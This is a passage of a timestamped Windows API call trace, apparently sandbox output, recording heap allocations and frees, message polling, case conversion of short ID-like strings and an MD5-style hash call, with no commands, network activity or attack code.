(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0207.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0207.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0207.710] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0207.710] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.710] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0207.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0207.710] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0207.710] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0207.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0207.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0207.711] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0207.711] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.711] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0207.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0207.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0207.711] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.711] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0207.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0207.711] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0207.711] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0207.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0207.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0207.711] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0207.712] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.712] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0207.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0207.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0207.712] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.712] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.712] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0207.712] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0207.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0207.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0207.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0207.712] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.712] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0207.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0207.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0207.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0207.713] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.713] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.713] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0207.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0207.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0207.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0207.713] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0207.713] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0207.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0207.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0207.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0207.714] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0207.714] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.714] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0207.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0207.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0207.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0207.714] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0207.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0207.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0207.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0207.714] CryptCreateHash (in: hProv=0xad2940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0207.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x24b2e00 [0207.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0207.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0207.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0207.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0207.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0207.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0207.715] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0207.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0207.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0207.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0207.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0207.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0207.715] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.715] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0207.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0207.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0207.715] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0207.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0207.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0207.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0207.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0207.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0207.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0207.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0207.716] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0207.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0207.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0207.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0207.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0207.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0207.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0207.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0207.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0207.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0207.716] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0207.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0207.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0207.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0207.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0207.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0207.717] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0207.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0207.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0207.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0207.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0207.717] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.717] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0207.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0207.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0207.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0207.717] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.717] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.717] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0207.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0207.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0207.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0207.718] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0207.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0207.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0207.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0207.718] CryptHashData (hHash=0xaa5760, pbData=0x24b1748, dwDataLen=0x3, dwFlags=0x1) returned 1 [0207.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x24b2e00 [0207.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0207.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0207.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0207.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0207.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0207.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0207.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0207.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0207.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0207.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0207.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0207.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0207.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0207.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0207.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0207.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0207.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0207.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0207.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0207.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0207.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0207.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0207.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0207.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0207.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0207.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0207.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0207.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0207.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0207.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0207.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0207.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0207.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0207.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0207.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0207.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0207.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0207.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0207.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0207.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0207.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0207.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0207.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0207.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0207.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0207.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0207.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0207.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0207.720] HeapFree 